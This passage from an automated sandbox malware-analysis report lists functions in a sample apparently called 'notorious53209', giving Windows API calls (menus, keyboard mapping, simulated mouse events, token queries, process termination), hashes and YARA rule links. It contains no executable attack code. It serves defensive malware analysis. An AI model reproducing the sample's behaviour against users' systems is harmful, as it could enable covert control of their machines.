                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                  • String ID:
                                                  • API String ID: 4046560759-0
                                                  • Opcode ID: efe1494d5d576f31d73c9dcc9bb79d681267b88bf8c80ec29403da85411b8b1b
                                                  • Instruction ID: 80c7b07dbfd8611953a514d6712223e020e9f759568859251d274f3c46c6a807
                                                  • Opcode Fuzzy Hash: efe1494d5d576f31d73c9dcc9bb79d681267b88bf8c80ec29403da85411b8b1b
                                                  • Instruction Fuzzy Hash: D7514731208200AFDB14EB28C885E6EBBF9FF89714F04492DF595972A1DB31EA04DB52
                                                  Function 00905A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00905A82
                                                  • GetMenuItemCount.USER32(00000000), ref: 00905AB9
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00905AE1
                                                  • GetMenuItemID.USER32(?,?), ref: 00905B50
                                                  • GetSubMenu.USER32(?,?), ref: 00905B5E
                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00905BAF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountMessagePostString
                                                  • String ID:
                                                  • API String ID: 650687236-0
                                                  • Opcode ID: b817d8fe4e5a2ffa4819728a39abb61e6eec8db115ff1a465a63c3ca54b3e615
                                                  • Instruction ID: 45a0a847dc5e9f07852c1efb990a81c48985a08d0f68327c731c62a8e014a19f
                                                  • Opcode Fuzzy Hash: b817d8fe4e5a2ffa4819728a39abb61e6eec8db115ff1a465a63c3ca54b3e615
                                                  • Instruction Fuzzy Hash: 35515C35A00619AFDB11EFA8C845AAEBBB4FF48310F154469E852E7391CB74AE41CF91
                                                  Function 008DF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 008DF3F7
                                                  • VariantClear.OLEAUT32(00000013), ref: 008DF469
                                                  • VariantClear.OLEAUT32(00000000), ref: 008DF4C4
                                                  • _memmove.LIBCMT ref: 008DF4EE
                                                  • VariantClear.OLEAUT32(?), ref: 008DF53B
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008DF569
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                  • String ID:
                                                  • API String ID: 1101466143-0
                                                  • Opcode ID: 30aa81a10de89e2f08e6c912ce081ccfbfc75c2343b528edde0d8bca05a0d397
                                                  • Instruction ID: 5cb52ddaecf2cd2d0871b4f9d09d416b2fbe47a04026076ad2b9202ffd251f73
                                                  • Opcode Fuzzy Hash: 30aa81a10de89e2f08e6c912ce081ccfbfc75c2343b528edde0d8bca05a0d397
                                                  • Instruction Fuzzy Hash: 84516AB5A00209EFCB10CF58D884AAAB7F9FF4C314B15816AEE59DB311D730E951CBA0
                                                  Function 008E26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 008E2747
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2792
                                                  • IsMenu.USER32(00000000), ref: 008E27B2
                                                  • CreatePopupMenu.USER32 ref: 008E27E6
                                                  • GetMenuItemCount.USER32(000000FF), ref: 008E2844
                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 008E2875
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                  • String ID:
                                                  • API String ID: 3311875123-0
                                                  • Opcode ID: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                                                  • Instruction ID: 50288e62baad466868a0fb0e22420a81b30e72e09fd6856fd2cdf11daafce5ed
                                                  • Opcode Fuzzy Hash: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                                                  • Instruction Fuzzy Hash: 1151A370900399DFDF24CF6AD888AAEBBF9FF46314F104169E825DB291D7709944CB52
                                                  Function 00881765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • BeginPaint.USER32(?,?), ref: 0088179A
                                                  • GetWindowRect.USER32(?,?), ref: 008817FE
                                                  • ScreenToClient.USER32(?,?), ref: 0088181B
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0088182C
                                                  • EndPaint.USER32(?,?), ref: 00881876
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                  • String ID:
                                                  • API String ID: 1827037458-0
                                                  • Opcode ID: 6cd970346a83e37c4fdb45bd21763514eb96b77ecfe6e8527d0256d883aeb687
                                                  • Instruction ID: 8d3346a2bc242a433b3314be7a16250a241a8ba592473d41469679f0a9574d1c
                                                  • Opcode Fuzzy Hash: 6cd970346a83e37c4fdb45bd21763514eb96b77ecfe6e8527d0256d883aeb687
                                                  • Instruction Fuzzy Hash: E24192705083059FDB20EF24CC89FB67BE8FB4A724F140629F554C72A1CB719946EB62
                                                  Function 0090B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(009467B0,00000000), ref: 0090B9CC
                                                  • EnableWindow.USER32(00000000,00000000), ref: 0090B9F0
                                                  • ShowWindow.USER32(009467B0,00000000), ref: 0090BA50
                                                  • ShowWindow.USER32(00000000,00000004), ref: 0090BA62
                                                  • EnableWindow.USER32(00000000,00000001), ref: 0090BA86
                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0090BAA9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                                                  • Instruction ID: 565b1416b449dda97e7e8ad3bca31999bb646f53bf8f6db01da499c645ec543d
                                                  • Opcode Fuzzy Hash: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                                                  • Instruction Fuzzy Hash: D0417F31604641EFDB22CF28C499B957BE4FF05324F5842B9FA588F6E2C731A846DB61
                                                  Function 008F73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 008F73BF
                                                    • Part of subcall function 008F3C94: GetWindowRect.USER32(?,?), ref: 008F3CA7
                                                  • GetDesktopWindow.USER32 ref: 008F73E9
                                                  • GetWindowRect.USER32(00000000), ref: 008F73F0
                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 008F7422
                                                    • Part of subcall function 008E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E555E
                                                  • GetCursorPos.USER32(?), ref: 008F744E
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008F74AC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                  • String ID:
                                                  • API String ID: 4137160315-0
                                                  • Opcode ID: 70878cb5852f0eaeb40f62bb09e1493810bbb9537b2fcb98d8e539c8df08e38d
                                                  • Instruction ID: 2effba4343483ca912074178f4cf5b938a87c5472b501b071bfec36aa33e032c
                                                  • Opcode Fuzzy Hash: 70878cb5852f0eaeb40f62bb09e1493810bbb9537b2fcb98d8e539c8df08e38d
                                                  • Instruction Fuzzy Hash: 3731C372508309AFD720DF24D849E6ABBE9FF99314F000919F588D7191CA30EA09CB96
                                                  Function 008EED8E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                    • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                                                  • _wcstok.LIBCMT ref: 008EEEFF
                                                  • _wcscpy.LIBCMT ref: 008EEF8E
                                                  • _memset.LIBCMT ref: 008EEFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                  • String ID: X
                                                  • API String ID: 774024439-3081909835
                                                  • Opcode ID: 12ccec537c0f3c1552c103620e1791621b4327a3bc07e97f616622da947ca074
                                                  • Instruction ID: d2dad40cf607b7775adbe63807318475bbd9c6ce636a99110615d909349183f1
                                                  • Opcode Fuzzy Hash: 12ccec537c0f3c1552c103620e1791621b4327a3bc07e97f616622da947ca074
                                                  • Instruction Fuzzy Hash: 63C137315087409FD724EF28C881A6AB7E4FF85314F14496DF999DB2A2DB70ED45CB82
                                                  Function 008D8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008D85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D8608
                                                    • Part of subcall function 008D85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D8612
                                                    • Part of subcall function 008D85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D8621
                                                    • Part of subcall function 008D85F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008D8628
                                                    • Part of subcall function 008D85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D863E
                                                  • GetLengthSid.ADVAPI32(?,00000000,008D8977), ref: 008D8DAC
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008D8DB8
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 008D8DBF
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 008D8DD8
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,008D8977), ref: 008D8DEC
                                                  • HeapFree.KERNEL32(00000000), ref: 008D8DF3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 169236558-0
                                                  • Opcode ID: 076a3f5cebb504edb0c556e483315160af4aca8a8d7e5e28365e342316c9a20d
                                                  • Instruction ID: 160df05ceaf3ff4484c9e0236cbcf8be39cce4e16c6ea5139ddb76ad194db832
                                                  • Opcode Fuzzy Hash: 076a3f5cebb504edb0c556e483315160af4aca8a8d7e5e28365e342316c9a20d
                                                  • Instruction Fuzzy Hash: 1911DC31514604FFDB609FA4CC18BAE7BBAFF54315F10422AE885D3290CB32AA40DB60
                                                  Function 0090C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0088134D
                                                    • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088135C
                                                    • Part of subcall function 008812F3: BeginPath.GDI32(?), ref: 00881373
                                                    • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088139C
                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0090C1C4
                                                  • LineTo.GDI32(00000000,00000003,?), ref: 0090C1D8
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0090C1E6
                                                  • LineTo.GDI32(00000000,00000000,?), ref: 0090C1F6
                                                  • EndPath.GDI32(00000000), ref: 0090C206
                                                  • StrokePath.GDI32(00000000), ref: 0090C216
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                  • String ID:
                                                  • API String ID: 43455801-0
                                                  • Opcode ID: ce98479c4fab7837663ca0d2d22fd6c3feebe60417b4c29952133d6eda68470b
                                                  • Instruction ID: 850b8316c13ba154ec8f1deac25e582e43b9bd2ee6d3512912b57753274d102e
                                                  • Opcode Fuzzy Hash: ce98479c4fab7837663ca0d2d22fd6c3feebe60417b4c29952133d6eda68470b
                                                  • Instruction Fuzzy Hash: 09111BB640810CBFDF119F94DC88FAA7FADEF09354F048021BA188A5A1C7719E55EBA0
                                                  Function 008A03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A03D3
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 008A03DB
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A03E6
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A03F1
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 008A03F9
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 008A0401
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: c069bdf56114c9912dedbcc37c4a7db2837ae170db7ce178728141ec7771ee23
                                                  • Instruction ID: f28b384e10350ffd9a44f37633fc6fa819085a694c9beae79b76f30df141b19a
                                                  • Opcode Fuzzy Hash: c069bdf56114c9912dedbcc37c4a7db2837ae170db7ce178728141ec7771ee23
                                                  • Instruction Fuzzy Hash: 35016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                  Function 008E568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E569B
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008E56B1
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 008E56C0
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E56CF
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E56D9
                                                  • CloseHandle.KERNEL32(00000000), ref: 008E56E0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: 3a2e6ce6df0b9d2f1ab10d25040f45f4c379fdaa2d47b99f6854cc81d8a9779f
                                                  • Instruction ID: d8d3bb6daed54b92c467a2159ad401ede001c690ed63d35edf500b53831c2a6b
                                                  • Opcode Fuzzy Hash: 3a2e6ce6df0b9d2f1ab10d25040f45f4c379fdaa2d47b99f6854cc81d8a9779f
                                                  • Instruction Fuzzy Hash: BAF01D32259558BFE7315BA29C1DEAB7B7CEBC6B11F000169FA04D14609AA11B0196B5
                                                  Function 008E74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 008E74E5
                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 008E74F6
                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00891044,?,?), ref: 008E7503
                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008E7510
                                                    • Part of subcall function 008E6ED7: CloseHandle.KERNEL32(00000000), ref: 008E6EE1
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E7523
                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 008E752A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: 606fdc38c681bc19b398265b412fe13b7e3fa5d527d2ff9cff47067c528416d5
                                                  • Instruction ID: 07032e2d4dd716a57adb5ebb557492a498593b0f6cb98fb0340c7f0d150ff85d
